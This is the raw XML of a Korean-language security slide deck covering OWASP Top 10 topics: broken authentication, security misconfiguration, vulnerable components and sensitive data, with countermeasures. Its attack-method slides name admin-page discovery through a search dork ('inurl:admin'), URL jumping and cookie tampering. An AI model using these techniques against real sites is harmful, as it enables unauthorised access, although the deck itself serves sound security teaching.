                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CE65127-F868-4087-AF8E-56968E7DF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76" y="3701602"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="그래픽 13" descr="서버">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADB4A260-F18C-477A-8D3D-BD56A2AB2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76" y="495914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81FEDA-5D15-456F-BB48-C68EA767A353}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1309816" y="2035933"/>
            <a:ext cx="3543222" cy="379369"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100"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서버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C82F5-79C7-484E-B866-C29668DC0F08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7338964" y="2018151"/>
            <a:ext cx="3543222" cy="4384676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="381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EFF76-A3D9-4146-8F16-F1A6B72CF7EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7338964" y="2018151"/>
            <a:ext cx="3543222" cy="379369"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100"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클라이언트</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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036987FD-7B0C-44C3-95E0-371CF83F1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9302" y="2625277"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="그래픽 23" descr="컴퓨터">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60FBEA10-D6C0-4412-8DD5-052FB7545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9302" y="3701602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id="{B61DF29E-FCD5-4668-A434-3434818DC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9302" y="4959141"/>
            <a:ext cx="914400" cy="9144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9D08E08-3AA5-4E26-83D7-9CB0FF9301B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="12" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2362676" y="3082477"/>
            <a:ext cx="7287951" cy="0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A1B9935-2250-46F4-987E-BF977DD917A6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62676" y="4158802"/>
            <a:ext cx="7287952" cy="0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D12625-2ADB-4F21-90BF-3FD6E70D9478}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2362676" y="5416341"/>
            <a:ext cx="7287952" cy="0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2B72AD-ACD4-4DAC-9E20-9D4E35601AF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5212546" y="2901264"/>
            <a:ext cx="1794662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웹사이트 제공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92298A-EE93-4A18-A976-9779AC479EB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5198669" y="3960647"/>
            <a:ext cx="1794662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로그인 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729AE4-E1FD-4E24-BF43-D54EC97FADA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5630937" y="5198897"/>
            <a:ext cx="930126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요청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EE00D5-5ED0-46B4-8B7F-85A0295BC706}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2777338" y="4597887"/>
            <a:ext cx="1794662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생성 및 유지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6881CD-A553-4A32-A8BE-B5E6F90F6E39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7586213" y="4450349"/>
            <a:ext cx="930126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응답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457EC-BE7A-41A6-9ED1-D79AB7C3BD9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7619007" y="5728791"/>
            <a:ext cx="930126" cy="37936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응답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A9EDE8-1DC0-42E6-AAFC-91FB2F1D7F73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2785694" y="5908326"/>
            <a:ext cx="1794662" cy="379369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99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저장소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B60FE-6AB5-4A68-9AB8-96C46299DFF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1343416" y="5765498"/>
            <a:ext cx="697981" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="38100" cmpd="dbl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세션 읽기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5FFDB67-4286-44EA-ABF6-056C83555577}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1877119" y="4582937"/>
            <a:ext cx="900219" cy="204634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B17CE9B-D496-474F-974D-2BA40926EF60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4574300" y="4650787"/>
            <a:ext cx="3011913" cy="121835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97F89B0-2673-4215-85A4-AC419234FA56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8516339" y="4319027"/>
            <a:ext cx="1242963" cy="306057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5706F7C-84E5-4B6F-9F58-4BB01129A99B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8541584" y="5612418"/>
            <a:ext cx="1242963" cy="306057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1808FD2-2DC7-4D2C-A27B-1F517A38145D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4590043" y="5924976"/>
            <a:ext cx="3011913" cy="121835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BFAA37E-7C2D-4860-97D0-A5817822971A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1894874" y="5908326"/>
            <a:ext cx="900219" cy="204634"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="FF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32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2402-6D1C-435A-BA4D-72E91F8FFA86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="616254" y="1460728"/>
            <a:ext cx="599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인증 구조의 설계상 취약점</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US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ECA19-3366-4DA1-B4A6-6D2E81D2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4" y="4646595"/>
            <a:ext cx="10450188" cy="97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9D691-7F58-4F27-AADF-DB19DA576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545" y="2412732"/>
            <a:ext cx="5139280" cy="1280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A63DB-40C6-4511-9EEC-6FE7D341E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93" y="2412732"/>
            <a:ext cx="4951915" cy="1743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62898-3079-4DEC-A0DC-143069182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661" b="26562"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6209545" y="3509158"/>
            <a:ext cx="4951915" cy="641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E1214E-B692-4DFF-9EE1-9E3469CC3C57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="841364" y="2524146"/>
            <a:ext cx="2772092" cy="646331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algn="ctr"/>
            <a:endParaRPr lang="ko-KR" altLang="en-US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3C65A-900D-4EA6-8068-3BFC051EDF26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6316534" y="2499663"/>
            <a:ext cx="1393301" cy="646331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algn="ctr"/>
            <a:endParaRPr lang="ko-KR" altLang="en-US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B4EA-32F4-43AB-9D10-B0CAD0C3E56E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="841364" y="4791258"/>
            <a:ext cx="2655369" cy="369332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399A44-6AC1-4BE1-B7E9-FBBF7F371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44" b="62048"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="794720" y="5194939"/>
            <a:ext cx="890147" cy="369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EE6D75-EF0C-46CC-AAA4-53F2C0FB4A10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="845491" y="5133172"/>
            <a:ext cx="106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E3636"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OOO</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FE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2402-6D1C-435A-BA4D-72E91F8FFA86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="616254" y="1460728"/>
            <a:ext cx="913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공격방법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1. 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관리자 페이지 노출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CAD74-51AE-46EA-8C3B-9FA5C2AC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4" y="2909896"/>
            <a:ext cx="5514351" cy="2933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06897-428C-4B2F-92B9-5FA659024C3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2774308" y="4804301"/>
            <a:ext cx="424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1234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5290D31-AD3B-4062-ABBF-5E66410F7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474" y="3116342"/>
            <a:ext cx="5295900" cy="25050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1E38F7-0E35-4CB1-B6E9-DD7009638FE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="616254" y="2334701"/>
            <a:ext cx="424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inurl.co.kr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inurl:admin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36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2402-6D1C-435A-BA4D-72E91F8FFA86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="616254" y="1460728"/>
            <a:ext cx="913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공격방법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2.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URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400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점핑</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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87D3E-A837-400F-95AA-2628D88E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4" y="3619499"/>
            <a:ext cx="4124325" cy="533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B2C679-F91D-432C-B858-889C722910F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1844040" y="3837938"/>
            <a:ext cx="1666240" cy="109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5952A-2050-4512-99D3-F94676357F80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3987800" y="3701533"/>
            <a:ext cx="482600" cy="369332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17FB79-0B2C-47FB-B0FB-E2450394D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7" y="3619499"/>
            <a:ext cx="4124325" cy="533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3CDD4C-F39A-445F-B3C4-CB8777F9E238}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7185673" y="3837938"/>
            <a:ext cx="1666240" cy="109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1BEF0-E96F-497A-AF2A-A0DEF5B8EE75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9329433" y="3701533"/>
            <a:ext cx="482600" cy="369332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rgbClr val="FF0066"/>
                </a:solidFill>
              </a:ln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FE4458-9F0E-4AC2-B782-203430FDE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0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9364359" y="3786186"/>
            <a:ext cx="382892" cy="23812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675A97-08DC-4FAF-ABAC-D863187C6172}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4470400" y="3837938"/>
            <a:ext cx="4859033" cy="0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8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E708C-49D4-4EF5-8ADB-5274CEDAAB68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="616254" y="1460728"/>
            <a:ext cx="913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itchFamily="18" charset="-127"/>
                <a:ea typeface="경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>공격방법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
                <a:ea typeface="경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
                <a:ea typeface="경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>쿠키 변조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BB8A88-02D9-45B0-A2C0-0B249538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12" y="1922393"/>
            <a:ext cx="4829175" cy="4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6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인증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D6F4B-0986-4E0A-94BD-82C29E019EDD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BDF86-7F11-4B37-AF1B-1CA894169669}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520491" y="2107057"/>
            <a:ext cx="110330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강력한 패스워드 정책 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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로그인의 모든 결과에 대해 동일한 메시지를 사용하여 등록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모든 실패에 대해 로그 남기기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서버 측 인증 기술 사용 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E6389-F181-45AF-97B2-3C44211457B5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보안대책</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1969490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A6.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잘못된 보안 구성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모두의 보안 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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이이백염</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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57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C32FFD-3766-4158-91BD-3D49667F2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DE76E0-B811-4D51-A41B-AB56EABAB482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95129-019B-4E4D-92AA-9D197FB49C1D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OWASP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FCB05-8457-4ABC-88CF-43B3F8B1FA70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="331756" y="228491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17" y="2008784"/>
            <a:ext cx="7674765" cy="425949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A2CF9-1F25-49FA-B675-E4F2CDC0817A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OWASP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TOP10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92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잘못된 보안 구성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228CC-926C-420E-890B-C61A228577A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웹서버 설치 시 기본적으로 설치되거나 임시로 만들어 놓은 파일이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FF99CC"/>
                </a:highlight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접근 제한 없이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웹의 홈 디렉토리에 놓여있는 경우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67248-FFBF-49E5-8EBF-4B5964C0E5B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A6.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CA045-93F5-4FCB-8504-FDD206B95930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보안구성이 잘못된 경우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1. </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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F85E45-6B3D-4DAF-A964-1B368594D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b="6659"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="616254" y="2404233"/>
            <a:ext cx="4514849" cy="3405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A80266-F88B-4AF4-9F3C-660B658C51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3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2873678" y="2404232"/>
            <a:ext cx="5905500" cy="34051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A5A04F-89DF-45C9-8A47-C8AB3DE378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8" b="27779"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8368350" y="2404231"/>
            <a:ext cx="3207396" cy="34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잘못된 보안 구성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67248-FFBF-49E5-8EBF-4B5964C0E5B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A6.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29C2A3-3517-4C47-AE9A-D838066768F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디렉토리 인덱스 기능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현재 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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브라우징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되는 디렉토리의 모든 파일들을 사용자에게 보여주는 기능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해커가 웹 애플리케이션의 구조를 파악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중요한 정보가 포함된 설정 파일을 조회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CA045-93F5-4FCB-8504-FDD206B95930}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="616254" y="1460728"/>
            <a:ext cx="815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보안구성이 잘못된 경우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2. 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디렉토리 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400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리스팅</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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7A95ED-D2A1-44FE-959B-E24961E5C20D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7608323" y="1700201"/>
            <a:ext cx="3861930" cy="4371996"/>
            <a:chOff x="4165035" y="1691560"/>
            <a:chExt cx="3861930" cy="43719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FFFCDB-E589-4582-AA22-6D0347B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5035" y="1691560"/>
              <a:ext cx="3861930" cy="437199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9EB1F5-F571-4052-BCBB-AB012BECF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065" t="72331" r="1"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7025406" y="3763385"/>
              <a:ext cx="1001559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67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잘못된 보안 구성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228CC-926C-420E-890B-C61A228577A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 클라우드 스토리지에 저장되어 있는 민감한 데이터에 대한 접근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ko-KR" altLang="en-US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67248-FFBF-49E5-8EBF-4B5964C0E5B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A6.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CA045-93F5-4FCB-8504-FDD206B95930}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="616254" y="1460728"/>
            <a:ext cx="11099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보안구성이 잘못된 경우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3. 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디폴트 공유 권한을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400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열어둔</a:t>
            </a:r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상태</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US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7DDEB8-599D-4057-94E4-88B7397A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2" y="2510741"/>
            <a:ext cx="8043876" cy="37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2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잘못된 보안 구성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228CC-926C-420E-890B-C61A228577A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빠르고 쉽게 다른 환경으로 전환할 수 있는 반복적인 보안 강화 절차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불필요한 요소 없이 최소한의 플랫폼으로 관리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서버의 설정 파일에서 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index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옵션을 제거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패치관리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스토리지 권한 검토절차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모든 영역의 보안 설정이 적절히 반영되어 있는지 검증할 수 있는 자동화된 절차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67248-FFBF-49E5-8EBF-4B5964C0E5B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A6.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5EF92-FED3-4246-8EF4-0BB55DDFB3B8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보안대책</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3853839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A9.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알려진 취약점이 있는 구성요소 사용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모두의 보안 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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이이백염</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="160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3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8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알려진 취약점이 있는 구성요소 사용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4E54D-9382-4CC6-A639-BBD9E3980AC3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웹페이지를 개발하게 되는데 사용된 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400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컴퍼넌트에서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400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취약점이 발견된다면 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400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기존에 해당 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" err="1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컴퍼넌트를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400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사용해서 구현했던 사이트들은 취약점을 통해서 공격이 가능</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400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858CC-5A30-46D4-B69A-7AEAB9ADF06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A9.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9F74-8626-43C9-A8DD-96129554FAFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="616254" y="1460728"/>
            <a:ext cx="714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알려진 취약점이 있는 구성요소를 사용한다는 것은</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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?</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="24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618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8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알려진 취약점이 있는 구성요소 사용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4E54D-9382-4CC6-A639-BBD9E3980AC3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858CC-5A30-46D4-B69A-7AEAB9ADF06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A9.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9F74-8626-43C9-A8DD-96129554FAFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="616254" y="1460728"/>
            <a:ext cx="714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알려진 취약점을 이용한 공격이 일어날 수 있는 이유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6317DB-DE03-4D25-8DFB-F7FEAC723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81"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="606906" y="2257483"/>
            <a:ext cx="5479747" cy="3993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90C54B-7A62-4EE8-A6CB-46BFE08702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650"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6418409" y="2257483"/>
            <a:ext cx="4968729" cy="39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8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알려진 취약점이 있는 구성요소 사용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4E54D-9382-4CC6-A639-BBD9E3980AC3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CVE-2017-5387</a:t>
            </a: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858CC-5A30-46D4-B69A-7AEAB9ADF06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A9.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8620D-EB79-4092-80D0-F3529E33FEC0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구성요소 취약점의 예시</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="CVE-2017-5487">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{350D8508-25AC-422A-9850-E77326086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8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알려진 취약점이 있는 구성요소 사용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4E54D-9382-4CC6-A639-BBD9E3980AC3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패치관리 프로세스 필요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안전한 링크를 통해 공식적인 출처로부터 컴포넌트 가져오기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유지 관리되지 않거나</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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이전 버전의 보안 패치를 만들지 않는 라이브러리 및 구성 요소를 모니터링</a:t>
            </a:r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858CC-5A30-46D4-B69A-7AEAB9ADF06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A9.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8620D-EB79-4092-80D0-F3529E33FEC0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보안대책</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2771423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A3.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34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DCF897-E80A-47A8-8248-FD7982976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9D6080-62A5-4085-98E7-5AE2B563F85A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A1. INJECTION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6827A-A76F-4BBE-9762-63FC1C49B625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949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84030" y="1992920"/>
            <a:ext cx="9823939" cy="4181231"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCCCC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54769" y="3126154"/>
            <a:ext cx="205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신용카드 번호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24369" y="3898869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금융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90092" y="2679669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패스워드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6890" y="4408763"/>
            <a:ext cx="16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주민등록번호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2829" y="3680152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건강기록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8798" y="2504827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사상</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>신념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2890" y="3714203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성생활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1505" y="5136603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8524" y="5250930"/>
            <a:ext cx="15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흡연여부</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="타원 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1184028" y="1992920"/>
            <a:ext cx="9823939" cy="4181231"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCCC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rgbClr val="FF6699"/>
                </a:solidFill>
                <a:latin typeface="a고딕17" pitchFamily="18" charset="-127"/>
                <a:ea typeface="a고딕17" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>개인정보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8460" y="1750644"/>
            <a:ext cx="359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OTF Bold" pitchFamily="18" charset="-127"/>
                <a:ea typeface="경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>민감한 데이터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</p:spTree>
    <p:extLst>
